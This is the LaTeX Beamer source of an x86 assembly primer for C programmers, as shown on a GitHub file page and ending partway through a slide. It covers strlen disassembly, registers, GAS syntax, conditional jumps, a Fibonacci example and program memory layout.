Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
3574 lines (3165 sloc) 101 KB
\documentclass[11pt,xcolor=dvipsnames]{beamer}
\usepackage{minted}
\usepackage{graphics}
\usecolortheme[named=Brown]{structure}
\usetheme{CambridgeUS}
\setbeamertemplate{navigation symbols}{}
\setbeamertemplate{section in toc}[ball unnumbered]
\setbeamertemplate{itemize item}[square]
\setbeamertemplate{itemize subitem}[square]
\setbeamerfont{frametitle}{size*={12}{1}}
\setbeamerfont{section in head/foot}{size*={9.5}{1}}
\setbeamersize{text margin left = 1em}
\usemintedstyle{perldoc}
\newminted{gas}{fontsize=\fontsize{9}{8},obeytabs=true}
\newminted{customobjdump}{fontsize=\fontsize{9}{8},obeytabs=true}
\newminted{c}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{nasm}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{bash}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newminted{text}{fontsize=\fontsize{9.25}{8.5},obeytabs=true}
\newcommand{\vs}{\vspace{0.5em}}
\newcommand{\mvs}{\vspace{-0.95em}}
\AtBeginSection{
\begin{frame}
\begin{center}
\structure{\huge \insertsection}
\end{center}
\end{frame}
}
\makeatletter
\setbeamertemplate{footline}
{
\leavevmode%
\hbox{%
\begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,center]{title in head/foot}%
\usebeamerfont{title in head/foot}\insertshorttitle
\end{beamercolorbox}%
\begin{beamercolorbox}[wd=.50\paperwidth,ht=2.25ex,dp=1ex,right]{date in head/foot}%
\usebeamerfont{date in head/foot}\insertshortdate{}\hspace*{2em}
\insertframenumber{} / \inserttotalframenumber\hspace*{2ex}
\end{beamercolorbox}}%
\vskip0pt%
}
\makeatother
\makeatletter
\setbeamertemplate{headline}
{
\leavevmode%
\hbox{%
\begin{beamercolorbox}[wd=\paperwidth,ht=5ex,dp=2.5ex,left]{section in head/foot}%
\hspace*{2ex}\usebeamerfont{section in head/foot}\insertsectionhead
\end{beamercolorbox} }%
% \begin{beamercolorbox}[wd=.30\paperwidth,ht=5ex,dp=2.5ex,left]{subsection in head/foot}%
% \usebeamerfont{subsection in head/foot}\hspace*{2ex}\insertsubsectionhead
% \end{beamercolorbox}}%
\vskip0pt%
}
\makeatother
\begin{document}
\title{x86 Assembly Primer for C Programmers}
\author{Ivan Sergeev}
\institute{\url{https://github.com/vsergeev/apfcp} \\ \vs {\ttfamily git clone git://github.com/vsergeev/apfcp.git}}
\date{January 22/24, 2013}
%%% Title Slide
\begin{frame}[plain]
\titlepage
\end{frame}
\section*{Introduction and Example}
%%% Introduction and Example Slide 0
\begin{frame}[fragile,t]
\frametitle{Why Assembly?}
\begin{itemize}
\item Embedded Systems
\item Well-characterized execution time
\item Bootstrapping an OS
\item Compilers
\item Debugging
\item Fancy instructions
\vs \vs
\pause
\item {\bf Sharpened intuition} on computing
\begin{itemize}
\item Gut instinct on implementation and feasibility
\item Justification for liking powers of two
\item Turing completeness is a special cage
\end{itemize}
\end{itemize}
\end{frame}
%%% Introduction and Example Slide 1
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c)}
Reasonable implementation of \verb+strlen()+ in C:\vs
\begin{ccode}
size_t ex_strlen(const char *s) {
size_t i;
for (i = 0; *s != '\0'; i++)
s++;
return i;
}
\end{ccode}
\end{frame}
%%% Introduction and Example Slide 2
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c) Disassembly}
Let's compile and disassemble it.\vs
\begin{customobjdumpcode}
$ gcc -O1 example-strlen.c -o example-strlen
$ objdump -d example-strlen
...
080483b4 <ex_strlen>:
80483b4: 8b 54 24 04 mov 0x4(%esp),%edx
80483b8: b8 00 00 00 00 mov $0x0,%eax
80483bd: 80 3a 00 cmpb $0x0,(%edx)
80483c0: 74 09 je 80483cb <ex_strlen+0x17>
80483c2: 83 c0 01 add $0x1,%eax
80483c5: 80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
80483c9: 75 f7 jne 80483c2 <ex_strlen+0xe>
80483cb: f3 c3 repz ret
...
\end{customobjdumpcode}
\begin{itemize}
\item Output of optimization levels 2 and 3 only differs with added padding bytes for memory alignment.
\end{itemize}
\end{frame}
%% Introduction and Example Slide 3
\begin{frame}[fragile,t]
\frametitle{Reasonable strlen (example-strlen.c) Disassembly}
Commented disassembly for \verb+ex_strlen()+:\vs
\begin{gascode}
# size_t strlen(const char *s);
ex_strlen:
mov 0x4(%esp),%edx # %edx = argument s
mov $0x0,%eax # %eax = 0
cmpb $0x0,(%edx) # Compare *(%edx) with 0x00
je end # If equal, jump to return
loop:
add $0x1,%eax # %eax += 1
cmpb $0x0,(%edx,%eax,1) # Compare *(%edx + %eax*1), 0x00
jne loop # If not equal, jump to add
end:
repz ret # Return, return value in %eax
\end{gascode}
\end{frame}
%%% Introduction and Example Slide 4
\begin{frame}[fragile,t]
\frametitle{glibc strlen (example-strlen.c)}
glibc's i386 implementation of \verb+strlen()+:\vs
\begin{customobjdumpcode}
$ cat glibc/sysdeps/i386/strlen.c
\end{customobjdumpcode}
\begin{ccode}
...
size_t
strlen (const char *str)
{
int cnt;
asm("cld\n" /* Search forward. */
/* Some old versions of gas need `repne' instead of `repnz'. */
"repnz\n" /* Look for a zero byte. */
"scasb" /* %0, %1, %3 */ :
"=c" (cnt) : "D" (str), "0" (-1), "a" (0));
return -2 - cnt;
}
...
\end{ccode}
\end{frame}
%%% Introduction and Example Slide 5
\begin{frame}[fragile,t]
\frametitle{glibc strlen (example-strlen.c) Disassembly}
Let's compile and disassemble it.\vs
\begin{customobjdumpcode}
$ gcc -O1 example-strlen.c -o example-strlen
$ objdump -d a.out
...
080483cd <glibc_strlen>:
80483cd: 57 push %edi
80483ce: b9 ff ff ff ff mov $0xffffffff,%ecx
80483d3: b8 00 00 00 00 mov $0x0,%eax
80483d8: 8b 7c 24 08 mov 0x8(%esp),%edi
80483dc: fc cld
80483dd: f2 ae repnz scas %es:(%edi),%al
80483df: b8 fe ff ff ff mov $0xfffffffe,%eax
80483e4: 29 c8 sub %ecx,%eax
80483e6: 5f pop %edi
80483e7: c3 ret
..
\end{customobjdumpcode}
\end{frame}
%%% Introduction and Example Slide 6
%\begin{frame}[fragile,t]
%\frametitle{glibc strlen (example-strlen.c) disassembly}
%Commented disassembly for glibc's \verb+strlen()+:\vs
%\begin{gascode}
%# size_t strlen(const char *s);
%strlen:
% push %edi # Save %edi
% mov $0xffffffff,%ecx # %ecx = 0xffffffff
% mov $0x0,%eax # %eax = 0
% mov 0x8(%esp),%edi # %edi = argument s
% cld # Clear direction flag
%
% repnz scas %es:(%edi),%al # Repeat scan while *(%edi) != 0x0
%
% mov $0xfffffffe,%eax # %eax = 0xfffffffe
% sub %ecx,%eax # %eax = %eax - %ecx
% pop %edi # Restore %edi
% ret # Return, return value in %eax
%\end{gascode}
%\end{frame}
%%% Introduction and Example Slide 7
\begin{frame}[fragile,t]
\frametitle{Disassembly side-by-side}
A side-by-side comparison of the disassembly:\vspace{-0.8em}
\begin{columns}[T]
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<ex_strlen>:
# Initialization
8b 54 24 04 mov 0x4(%esp),%edx
b8 00 00 00 00 mov $0x0,%eax
80 3a 00 cmpb $0x0,(%edx)
74 09 je 80483cb <ex_strlen+0x17>
# Main loop
83 c0 01 add $0x1,%eax
80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
75 f7 jne 80483c2 <ex_strlen+0xe>
# End
f3 c3 repz ret
\end{customobjdumpcode*}
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<glibc_strlen>:
# Initialization
57 push %edi
b9 ff ff ff ff mov $0xffffffff,%ecx
b8 00 00 00 00 mov $0x0,%eax
8b 7c 24 08 mov 0x8(%esp),%edi
fc cld
# Main loop
f2 ae repnz scas %es:(%edi),%al
# End
b8 fe ff ff ff mov $0xfffffffe,%eax
29 c8 sub %ecx,%eax
5f pop %edi
c3 ret
\end{customobjdumpcode*}
\end{columns}
\end{frame}
%%% Introduction and Example Slide 8
\begin{frame}[fragile,t]
\frametitle{Disassembly side-by-side}
\mvs
A side-by-side comparison of the main loop disassembly:\vspace{-0.8em}
\begin{columns}[T]
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<ex_strlen>:
...
# Main loop
83 c0 01 add $0x1,%eax
80 3c 02 00 cmpb $0x0,(%edx,%eax,1)
75 f7 jne 80483c2 <ex_strlen+0xe>
...
\end{customobjdumpcode*}
\column{0.5\textwidth}
\begin{customobjdumpcode*}{fontsize=\fontsize{6.5}{8},frame=single}
<glibc_strlen>:
...
# Main loop
f2 ae repnz scas %es:(%edi),%al
...
\end{customobjdumpcode*}
\end{columns}
\vs
\begin{itemize}
\item glibc's i386 \verb+strlen()+ "main loop" is only 2 bytes!
\begin{itemize}
\item In fact, it's only one instruction: \verb+repnz scas (%edi),%al+.
\end{itemize}
\pause
\item Reasonable strlen's "main loop" is three instructions, with a conditional branch \verb+jne 0x80483c2+.
\pause
\item An older example of when hand-assembly utilized processor features for a more efficient implementation
\item glibc's i486 and i586 implementations of {\ttfamily strlen()} are still assembly, but much more complicated, taking into account memory alignment and processor pipeline
\end{itemize}
\end{frame}
% Outline Slide
\section*{Table of Contents}
\begin{frame}{Outline}
\tableofcontents[part=1]
\end{frame}
\begin{frame}{Outline}
\tableofcontents[part=2]
\end{frame}
\part{1}
\section{Topic 1: State, Instructions, Fetch-Decode-Execute}
\begin{frame}[fragile,t]
\frametitle{State and Instructions}
\begin{itemize}
\item State is retained information
\begin{itemize}
\item CPU Registers: small, built-in, referred to by name \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, ...})
\item Memory: large, external, referred to by address \\ ({\ttfamily 0x80000000, ...})
\end{itemize}
\item Instructions affect and/or use state
\begin{itemize}
\item Add a constant to a register, subtract two registers, write to a memory location, jump to a memory location if a flag is set, etc.
\end{itemize}
\vs
\pause
\item Sufficient expressiveness of instructions makes a CPU Turing complete, provided you have infinite memory
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{8086 CPU Registers}
\mvs
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/8086state.png}
\end{figure}
\begin{itemize}
\item Original 8086 was a 16-bit CPU
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{386+ CPU Registers}
\mvs
\begin{figure}
\centering \includegraphics[width=0.85\textwidth]{figures/386state.png}
\end{figure}
\begin{itemize}
\item 386+ is a 32-bit CPU, all registers extended to 32-bits
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{386+ CPU Registers and Memory}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386statemem.png}
\end{figure}
\begin{itemize}
\item Registers + Memory comprise (almost) total system state
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instructions}
\begin{itemize}
\item x86 instructions manipulate CPU registers, memory, and I/O ports
\item Encoded as numbers, sitting in memory like any other data
\item Uniquely defined for each architecture in its {\bf instruction set}
\item {\ttfamily \%eip} contains address of next instruction
\vs \vs \vs
\pause
\item Fetch-Decode-Execute Simplified CPU Model
\begin{itemize}
\item CPU {\bf fetches} data at address {\ttfamily \%eip} from main memory \\
\item CPU {\bf decodes} data into an instruction \\
\item CPU {\bf executes} instruction, \\ possibly manipulating memory, I/O, and its own state, including {\ttfamily \%eip}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute0.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute1.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute2.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute3.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute4.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute5.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute6.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Instruction Fetch-Decode-Execute}
\mvs
\begin{figure}
\centering \includegraphics[width=0.65\textwidth]{figures/386fetch_decode_execute7.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Sampling of Core 386+ User Instructions}
\mvs
\begin{itemize}
\item {\bf Arithmetic:} {\ttfamily adc, add, and, cmp, dec, div, idiv, imul, inc, mul, neg, not, or, rcl, rcr, rol, ror, sal, sar, sbb, shl, shr, sub, test, xor, lea}
\item {\bf Flags:} {\ttfamily clc / stc, cld / std, cli / sti, cmc}
\item {\bf String:} {\ttfamily cmpsb / cmpsw, lodsb / lodsw, movsb / movsw, scasb / scasw, stosb / stosw, repxx}
\item {\bf Stack:} {\ttfamily push, pop}
\item {\bf Memory:} {\ttfamily mov}
\item {\bf Flow Control:} {\ttfamily call, jxx, jmp, ret / retn / retf, loop/loopxx}
\item {\bf Operating System:} {\ttfamily int, into, iret, hlt, pushf, popf, popad, popfd, pushad}
\item {\bf Input/Output:} {\ttfamily in, out}
\item {\bf Misc:} {\ttfamily aaa, aad, aam, aas, daa, cbw, cwd, lahf, lds, les, lock, wait, xchg, xlat, nop}
\end{itemize}
\end{frame}
\section{Topic 2: Arithmetic, and Data Transfer}
\begin{frame}[fragile,t]
\frametitle{Instructions in Assembly}
\begin{itemize}
\item Instructions represented by a mnemonic and operands
\item AT\&T/GAS syntax
\begin{itemize}
\item {\bf No operands:} \verb+<mnemonic>+
\begin{itemize}
\item {\ttfamily nop}
\end{itemize}
\item {\bf One operand:} \verb+<mnemonic> <dest>+
\begin{itemize}
\item {\ttfamily incl \%eax}
\end{itemize}
\item {\bf Two operands:} \verb+<mnemonic> <src>,<dest>+
\begin{itemize}
\item {\ttfamily addl \$0x1, \%eax}
\end{itemize}
\end{itemize}
\vs
\pause
\item Source and destination operands are typically one of:
\begin{itemize}
\item {\bf Register:} {\ttfamily \%eax, \%ebx, \%ecx, \%edx,} etc.
\begin{itemize}
\item {\ttfamily movl \%eax, \%ebx}
\end{itemize}
\item {\bf Immediate:} constant value embedded in the instruction encoding
\begin{itemize}
\item {\ttfamily movl \$0x1, \%eax}
\end{itemize}
\item {\bf Memory:} constant value representing an absolute (0x80000000) or relative address (+4)
\begin{itemize}
\item {\ttfamily movl 0x800000000, \%eax}
\end{itemize}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Arithmetic and Data Transfer (example-arith-mov.S)}
\mvs
\begin{gascode}
.section .text
nop # ; (Do nothing!)
# add, sub, adc, and, or, xor
addl %eax, %ebx # %ebx = %ebx + %eax
addl magicNumber, %ebx # %ebx = %ebx + *(magicNumber)
addl %ebx, magicNumber # *(magicNumber) = *(magicNumber) + %ebx
addl $0x12341234, %ebx # %ebx = %ebx + 0x12341234
# inc, dec, not, neg
decl %eax # %eax--
decw %ax # %ax--
decb %al # %al--
# rol, rcl, shl, shr, sal, sar
shrl $3, %eax # %eax = %eax >> 3
shrl $3, magicNumber # *(magicNumber) = *(magicNumber) >> 3
# mov
movl %eax, %ebx # %ebx = %eax
movl magicNumber, %eax # %eax = *(magicNumber)
movl %eax, magicNumber # *(magicNumber) = %eax
.section .data
magicNumber: .long 0xdeadbeef # *magicNumber = 0xdeadbeef;
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Ex. Arithmetic and Data Transfer (example-arith-mov.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-arith-mov.S -o example-arith-mov.o
$ ld example-arith-mov.o -o example-arith-mov
$ objdump -D example-arith-mov
Disassembly of section .text:
08048074 <.text>:
8048074: 90 nop
8048075: 01 c3 add %eax,%ebx
8048077: 03 1d a4 90 04 08 add 0x80490a4,%ebx
804807d: 01 1d a4 90 04 08 add %ebx,0x80490a4
8048083: 81 c3 34 12 34 12 add $0x12341234,%ebx
8048089: 48 dec %eax
804808a: 66 48 dec %ax
804808c: fe c8 dec %al
804808e: c1 e8 03 shr $0x3,%eax
8048091: c1 2d a4 90 04 08 03 shrl $0x3,0x80490a4
8048098: 89 c3 mov %eax,%ebx
804809a: a1 a4 90 04 08 mov 0x80490a4,%eax
804809f: a3 a4 90 04 08 mov %eax,0x80490a4
Disassembly of section .data:
080490a4 <magicNumber>:
80490a4: ef out %eax,(%dx)
80490a5: be .byte 0xbe
80490a6: ad lods %ds:(%esi),%eax
80490a7: de .byte 0xde
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{A Note on GAS Syntax}
\begin{itemize}
\item Syntax
\begin{itemize}
\item {\ttfamily \%} precedes a register: {\ttfamily \%eax}
\item {\ttfamily \$} precedes a constant: {\ttfamily \$5, \$0xff, \$07, \$'A, \$0b111}
\item {\ttfamily .} precedes a directive: {\ttfamily .byte, .long, .ascii, .section, .comm}
\item {\ttfamily \#} precedes a comment
\vs
\pause
\item {\bf No special character precedes a dereferenced memory address:} \\ {\ttfamily movl \%eax, 0x80000000 \;\; \# *(0x80000000) = \%eax}
\pause
\item {\ttfamily mylabel:} defines a label, a symbol of name {\ttfamily mylabel} containing the address at that point
\pause
\end{itemize}
\vs
\item Directives
\begin{itemize}
\item Place a raw byte: {\ttfamily .byte 0xff}
\item Place a raw short: {\ttfamily .short 0x1234}
\item Place a raw ASCII string: {\ttfamily .ascii "Hello World!\textbackslash0"}
\item Specify a section (e.g. .text, .data, .rodata, .bss): \\ {\ttfamily .section <section-name>}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{A Note on GAS Syntax}
\begin{itemize}
\item Instruction Size Suffix
\begin{itemize}
\item x86 is backwards compatible to the original 8086
\item Inherited instructions operate on 8-bits, 16-bits, 32-bits
\item Naturally, they often have the same name...
\vs
\pause
\item GAS supports the syntax {\ttfamily <mnemonic><size>} \\ to unambiguously encode the correct instruction \\
\begin{textcode}
movb $0xff, %al movw %bx, %ax movl memAddr, %eax
incb %ah incw %ax incl %eax
\end{textcode}
\end{itemize}
\end{itemize}
\begin{center}
\begin{tabular}{c|c|c}
\textbf{Name} & \textbf{Size} & \textbf{GAS Suffix} \\
\hline \hline
byte & 8-bits & b \\
word & 16-bits & w \\
dword & 32-bits & l \\
qword & 64-bits & q \\
\end{tabular}
\end{center}
\end{frame}
\section{Basic Tools}
\begin{frame}[fragile,t]
\frametitle{Common Invocations}
\begin{itemize}
\item Assemble: {\ttfamily as prog.asm -o prog.o}
\item Link directly: {\ttfamily ld prog.o -o prog}
\item Link with libc: {\ttfamily gcc prog.o -o prog}
\item Disassemble: {\ttfamily objdump -D prog}
\item View Sections: {\ttfamily objdump -x prog}
\item View Symbols: {\ttfamily nm prog}
\item Debug Disassembly: {\ttfamily gdb prog}
\begin{itemize}
\item Step instruction: {\ttfamily si}
\item Disassembly layout: {\ttfamily layout asm}
\item Set breakpoint at symbol: {\ttfamily b \_start}
\item Set breakpoint at address: {\ttfamily b * 0x80001230}
\item View CPU registers: {\ttfamily info reg}
\item Disassemble next three instructions: {\ttfamily x/3i \$eip}
\item View five dwords of memory starting at {\ttfamily \$esp}: {\ttfamily x/5w \$esp}
\item View five bytes of memory starting at {\ttfamily 0xbffffff0}: {\ttfamily x/5b 0xbffffff0}
\end{itemize}
\end{itemize}
\end{frame}
\section{Topic 3: Flow Control}
\begin{frame}[fragile,t]
\frametitle{Modifying Flow of Execution}
\mvs
\begin{itemize}
\item With most instructions, CPU will increment {\ttfamily \%eip} by the executed instruction size to proceed to the next immediate instruction
\end{itemize}
\begin{gascode}
a_label:
nop
addl $5, %eax # %eax = %eax + 5
xorl %ecx, %ebx # %ebx = %ebx ^ %ecx
another_label:
nop
nop
\end{gascode}
\pause
\begin{itemize}
\item The unconditional {\ttfamily jmp <label>} instruction allows us to explicitly change {\ttfamily \%eip} to another address, and continue execution from there
\end{itemize}
\begin{gascode}
a_label:
nop
addl $5, %eax # %eax = %eax + 5
jmp somewhere_else # Jump to somewhere_else
another_label:
... # We just skipped over all of this
somewhere_else:
xorl %ecx, %ebx # %ebx = %ebx ^ %ecx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Modifying Flow of Execution Conditionally}
\begin{itemize}
\item Certain instructions will set boolean bit flags in the {\ttfamily \%eflags} registers based on the result
\begin{itemize}
\item Implicitly, based on result of an arithmetic instruction
\item Explicitly, with {\ttfamily cmp} or {\ttfamily test} between two operands
\end{itemize}
\item Flags are the basis of flow control with conditional jumps, which \\ update {\ttfamily \%eip} to a relative offset if an {\ttfamily \%eflags} flag is set
\end{itemize}
\mvs
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/eflags.png} \\
\vs
\includegraphics[height=0.3\paperheight]{figures/ia32-eflags.png}\let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer’s Manual Vol. 1, A-1}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Conditional Jumps}
\mvs
\begin{table}[h]\scriptsize
\begin{tabular}{l|c|c}
\textbf{Instruction} & \textbf{\%eflags Condition} & \textbf{Description} \\
\hline
{\ttfamily jmp <label>} & - & Unconditional Jump \\
\textbf{Unsigned Conditional Jumps} & & \\
\hline
{\ttfamily ja / jnbe <label>} & (CF or ZF) = 0 & Above / Not below or equal \\
{\ttfamily jae / jnb <label>} & CF = 0 & Above or equal / Not below \\
{\ttfamily jb / jnae <label>} & (CF or ZF) = 1 & Below / Not above or equal \\
{\ttfamily jc <label>} & CF = 1 & Carry \\
{\ttfamily je/jz <label>} & ZF = 1 & Equal / Zero \\
{\ttfamily jnc <label>} & CF = 0 & Not Carry \\
{\ttfamily jne/jnz <label>} & ZF = 0 & Not Equal / Not Zero \\
\textbf{Signed Conditional Jumps} & & \\
\hline
{\ttfamily jg / jnle <label>} & ((SF xor OF) or ZF) = 0 & Greater / Not Less or Equal\\
{\ttfamily jge / jnl <label>} & (SF xor OF) = 0 & Greater or Equal / Not Less\\
{\ttfamily jl / jnge <label>} & (SF xor OF) = 1 & Less / Not Greater or Equal \\
{\ttfamily jle / jng <label>} & ((SF xor OF) or ZF) = 1 & Less or Equal / Not Greater \\
{\ttfamily jno <label>} & OF = 0 & Not overflow \\
{\ttfamily jns <label>} & SF = 0 & Not sign (non-negative) \\
{\ttfamily jo <label>} & OF = 1 & Overflow \\
{\ttfamily js <label>} & SF = 1 & Sign (negative) \\
\end{tabular}
\end{table} \let\thefootnote\relax\footnote{Intel 64 and IA-32 Architectures Software Developer’s Manual Vol. 1, 7-23}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S)}
\mvs
\begin{gascode}
.section .text
# cmpl %oper1, %oper2
# updates flags based on result of %oper2 - %oper1
cmpl %eax, %ecx
cmpl $0xFF, %eax
# conditional jumps
je label_foo # jump if %oper2 == %oper1
jg label_bar # jump if %oper2 > %oper1
jl label_xyz # jump if %oper2 < %oper1
# test %oper1, %oper2
# updates flags based on result of %oper2 & %oper1
testl %eax, %ecx
testl $0x1F, %eax
# arithmetic
# updates flags based on result
addl %eax, %ebx
incl %eax
decl %ebx
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Continued}
\mvs
\begin{gascode}
# labels are just symbols containing an address to make
# it easy to specify addresses
label1:
label2:
movl $0, %eax # %eax = 0
incl %eax # %eax++ ; ZF set to 0!
jz label1 # Jump if ZF = 1 (not taken)
jnz label3 # Jump if ZF = 0 (taken)
decl %eax # I won't be executed
label3:
nop
nop # Execution will fall
label4: # through label4
jmp label1 # Jump back to label1
# Loops
movl $10, %eax
loop:
nop
decl %eax
jnz loop
# Direct Comparison
cmpl $0x05, %eax
je label_foo # Jump to label_foo if %eax == 5
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ as example-cond-jmp.S -o example-cond-jmp.o
$ ld example-cond-jmp.o -o example-cond-jmp
$ objdump -D example-cond-jmp
Disassembly of section .text:
08048054 <_start>:
8048054: 39 c1 cmp %eax,%ecx
8048056: 3d ff 00 00 00 cmp $0xff,%eax
804805b: 74 2c je 8048089 <label_foo>
804805d: 7f 2b jg 804808a <label_bar>
804805f: 7c 2a jl 804808b <label_xyz>
8048061: 85 c1 test %eax,%ecx
8048063: a9 1f 00 00 00 test $0x1f,%eax
8048068: 01 c3 add %eax,%ebx
804806a: 40 inc %eax
804806b: 4b dec %ebx
...
\end{customobjdumpcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Example Conditional Jumps (example-cond-jmp.S) Disassembly}
\mvs
\begin{customobjdumpcode}
0804806c <label1>:
804806c: b8 00 00 00 00 mov $0x0,%eax
8048071: 40 inc %eax
8048072: 74 f8 je 804806c <label1>
8048074: 75 01 jne 8048077 <label3>
8048076: 48 dec %eax
08048077 <label3>:
8048077: 90 nop
8048078: 90 nop
08048079 <label4>:
8048079: eb f1 jmp 804806c <label1>
804807b: b8 0a 00 00 00 mov $0xa,%eax
08048080 <loop>:
8048080: 90 nop
8048081: 48 dec %eax
8048082: 75 fc jne 8048080 <loop>
8048084: 83 f8 05 cmp $0x5,%eax
8048087: 74 00 je 8048089 <label_foo>
...
\end{customobjdumpcode}
\end{frame}
\section{Program Example: Iterative Fibonacci}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S)}
\mvs
\begin{gascode}
.section .text
.global main
main:
movl $0, %ecx # f_n-2 = 0
movl $1, %ebx # f_n-1 = 1
movl $1, %eax # f_n = 1
movl $12, %edi # Number of integers to compute
fib_loop:
# Print %eax
call myprint
movl %ebx, %ecx # f_n-1 -> f_n-2
movl %eax, %ebx # f_n -> f_n-1
addl %ecx, %eax # New f_n = Old f_n + f_n-2
# Decrement %edi
decl %edi
jnz fib_loop
ret
myprint:
...
\end{gascode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S) Output}
\mvs
\begin{textcode}
$ as fibonacci.S -o fibonacci.o
$ gcc fibonacci.o -o fibonacci # (Easy way to link with libc,
# more on this, later)
$ ./fibonacci
1
2
3
5
8
13
21
34
55
89
144
233
$
\end{textcode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Iterative Fibonacci (fibonacci.S) Disassembly}
\mvs
\begin{customobjdumpcode}
$ objdump -D fibonacci
Disassembly of section .text:
...
080483e4 <main>:
80483e4: b9 00 00 00 00 mov $0x0,%ecx
80483e9: bb 01 00 00 00 mov $0x1,%ebx
80483ee: b8 01 00 00 00 mov $0x1,%eax
80483f3: bf 0c 00 00 00 mov $0xc,%edi
080483f8 <fib_loop>:
80483f8: e8 0a 00 00 00 call 8048407 <myprint>
80483fd: 89 d9 mov %ebx,%ecx
80483ff: 89 c3 mov %eax,%ebx
8048401: 01 c8 add %ecx,%eax
8048403: 4f dec %edi
8048404: 75 f2 jne 80483f8 <fib_loop>
8048406: c3 ret
...
\end{customobjdumpcode}
\begin{itemize}
\item Main code is only 35 bytes!
\item Can easily be cut down to 28 bytes by optimizing the clears
\end{itemize}
\end{frame}
\section{Topic 4: Program Memory}
\begin{frame}[fragile,t]
\frametitle{Static Allocation in C}
\begin{itemize}
\item From C, we're used to uninitialized and initialized static memory allocations
\end{itemize}
\vs
\begin{ccode}
/* Uninitialized static allocation, read-write */
char buff[1024];
/* Initialized static allocations, read-write */
int foo = 5;
char str[] = "Hello World";
\end{ccode}
\pause
\begin{ccode}
/* Trickier example: */
char *p = "Hello World";
/* char *p is an initialized static allocation, read-write */
/* "Hello World" is initialized static allocation, READ-ONLY */
int main(void) {
return 0;
}
\end{ccode}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Static Allocation in Assembly}
\begin{itemize}
\item Responsible for manually specifying the contents of memory
\item Description is stored in a binary format like ELF, \\ in terms of sections, r/w/x permissions, and sizes
\item OS is responsible for setting up memory as described in ELF binary in {\ttfamily execve()}
\pause
\vs\vs\vs
\item {\ttfamily section \textbf{.text}}: \textbf{read-only executable} program instructions
\item {\ttfamily section \textbf{.rodata}}: initialized statically allocated \textbf{read-only data}
\item {\ttfamily section \textbf{.data}}: initialized statically allocated \textbf{read-write data}
\item {\ttfamily section \textbf{.bss}}: uninitialized statically allocated \textbf{read-write data}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Memory Layout}
\mvs
\begin{figure}
\centering
\includegraphics[height=0.75\paperheight]{figures/memlayout.png}
\end{figure}
\end{frame}
\begin{frame}[fragile,t]
